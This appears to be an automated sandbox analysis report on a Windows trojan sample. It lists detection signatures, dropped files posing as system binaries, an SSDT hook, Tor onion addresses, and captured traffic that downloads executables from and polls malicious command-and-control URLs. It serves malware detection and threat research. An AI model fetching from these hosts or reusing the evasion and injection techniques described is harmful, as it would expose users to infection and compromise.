Windows Analysis Report 0NlSa5bf55

Overview

General Information

Sample Name: 0NlSa5bf55 (renamed file extension from none to exe)
Analysis ID: 515565
MD5: ee30d6928c9de84049aa055417cc767e
SHA1: a2aec2076bdfa92e5cda03443bec7b6c3287b43a
SHA256: 0ab024b0da0436fddc99679a74a26fdcd9851eb00e88ff2998f001ccd0c9016f
Tags: 32, exe, trojan

Detection

Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Metasploit Payload
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sigma detected: System File Execution Location Anomaly
Found Tor onion address
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses shutdown.exe to shutdown or reboot the system
May modify the system service descriptor table (often done to hook functions)
Machine Learning detection for dropped file
Contains functionality to inject threads in other processes
Performs DNS TXT record lookups
Sigma detected: Suspicious Service DACL Modification
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Enables security privileges
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: 0NlSa5bf55.exe Virustotal: Detection: 66%
Source: 0NlSa5bf55.exe ReversingLabs: Detection: 64%
Antivirus detection for URL or domain
Source: https://runmodes.com/api/logMachineGuidServiceVersionarch=64&build_number=17134&ec%3Af4%3Abb%3A86%3A Avira URL Cloud: Label: malware
Source: https://runmodes.com/api/log Avira URL Cloud: Label: malware
Source: https://runmodes.com/api/log442b90d2-fde4-485f-a003-6086e2191d6e.uuid.trumops.com Avira URL Cloud: Label: malware
Source: http://newscommer.com/app/app.exe URL Reputation: Label: malware
Source: https://runmodes.com/api/loginvalid Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: runmodes.com Virustotal: Detection: 6%
Source: server16.trumops.com Virustotal: Detection: 6%
Source: gohnot.com Virustotal: Detection: 10%
Source: server2.trumops.com Virustotal: Detection: 6%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Avira: detection malicious, Label: TR/Agent.twerk
Source: C:\Users\user\Desktop\upd.exe Avira: detection malicious, Label: TR/AD.GoCloudnet.vvvot
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Avira: detection malicious, Label: TR/Redcap.gsjan
Source: C:\Windows\windefender.exe Avira: detection malicious, Label: TR/Crypt.XPACK.eocey
Source: C:\Windows\rss\csrss.exe Avira: detection malicious, Label: TR/AD.GoCloudnet.vvvot
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Metadefender: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Metadefender: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\upd.exe Metadefender: Detection: 31%
Source: C:\Users\user\Desktop\upd.exe ReversingLabs: Detection: 85%
Source: C:\Windows\rss\csrss.exe Metadefender: Detection: 31%
Source: C:\Windows\rss\csrss.exe ReversingLabs: Detection: 85%
Source: C:\Windows\windefender.exe Metadefender: Detection: 28%
Source: C:\Windows\windefender.exe ReversingLabs: Detection: 78%
Machine Learning detection for dropped file
Source: C:\Users\user\Desktop\upd.exe Joe Sandbox ML: detected
Source: C:\Windows\rss\csrss.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 11.2.csrss.exe.11c38000.10.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.2.csrss.exe.11bb8000.9.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.0NlSa5bf55.exe.115f2000.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.0NlSa5bf55.exe.115f4000.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.0NlSa5bf55.exe.115f6000.2.unpack Avira: Label: TR/Patched.Ren.Gen

Compliance:

Uses 32bit PE files
Source: 0NlSa5bf55.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, RELOCS_STRIPPED
Source: Binary string: Loader.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp, bootx64.efi.11.dr
Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: symsrv.pdb source: upd.exe, 00000005.00000002.321400821.0000000000C57000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.350292388.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.565483250.0000000000C57000.00000040.00020000.sdmp
Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: '(.EfiGuardDxe.pdb source: upd.exe.0.dr
Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: Unable to locate the .pdb file in this location source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: The module signature does not match with .pdb signature. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: .pdb.dbg source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: '(EfiGuardDxe.pdbx source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp, EfiGuardDxe.efi.11.dr
Source: Binary string: symsrv.pdbGCTL source: upd.exe, 00000005.00000002.321400821.0000000000C57000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.350292388.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.565483250.0000000000C57000.00000040.00020000.sdmp
Source: Binary string: or you do not have access permission to the .pdb location. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: EfiGuardDxe.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp, EfiGuardDxe.efi.11.dr
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: dbghelp.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: dbghelp.pdbGCTL source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019D5C10 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose, 36_2_00007FF7019D5C10

Networking:

Found Tor onion address
Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Nov 2021 12:12:39 GMTContent-Type: application/octet-streamContent-Length: 3788288Connection: keep-alivecontent-disposition: attachment; filename=app.exeetag: "616ea4c2-39ce00"last-modified: Tue, 19 Oct 2021 10:58:10 GMTCache-Control: max-age=3600CF-Cache-Status: HITAge: 726Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aGUDRkZW12WFb0Z1WtbDazJRsyQjmf37XuogvaYwPWl6MnjPMl4eqYDp2G4rixUdVCHSJNAij3d%2BJyafZy7nG%2FpPEkNqHIpND7MIWu%2Fkz1fTe%2FgV6DrKP1Wv8esq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 6a8dc077cd066933-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$90R @R@ UPX00RUPX19@R9@UPX29@
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Nov 2021 12:13:29 GMTContent-Type: application/octet-streamContent-Length: 2102272Connection: keep-alivecontent-disposition: attachment; filename=watchdog.exeetag: "616ea494-201400"last-modified: Tue, 19 Oct 2021 10:57:24 GMTCache-Control: max-age=3600CF-Cache-Status: HITAge: 802Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yf%2BGD8l7373ZeZ%2Bx2Q1xpl%2FgZXFhtKWeXRYuOa7bn%2FvVZo559VS4xe2flpcsnosSzS0Rx9wZavPEonRFgpdfi6r8EDDYvPMTxUa18GxPfvjXzcqZC%2B2iZbRyMbg4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 6a8dc1b08ff06913-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api/poll HTTP/1.1Host: server2.trumops.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0Content-Length: 640Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: POST /api/poll HTTP/1.1Host: server2.trumops.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36Content-Length: 660Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Nov 2021 12:13:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11CF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4Ub0PA9Fmqq7OZHOTnOGcBRJwBnYj5ryxvyzrx6FOHxWcZzcHyVWiVfUPaGejltXTD%2F6SRqhh%2Br%2FCIFY9JbyleDFHvMUOkdoo5Awj3PJCVy9rH9NMnIkhsde%2BuCf1%2BDnWMfdu2Yl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a8dc126190b7037-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Nov 2021 12:13:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=jp6rg8da1hqqg23tjramjvmq4d; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VULNO5Jg3NJ174F0kG6Gst68KUn7qITHMZj2A7IY4Nz0a1rfozYrXWuoYRMg%2FxRYwvjKeu5aorLZfTsqKFJnH5%2B410dszzmqHyXdOL7bIrl%2BSVbGW2OHUGkkeU93qYeHI6CXQle4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a8dc15e7c2f774a-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
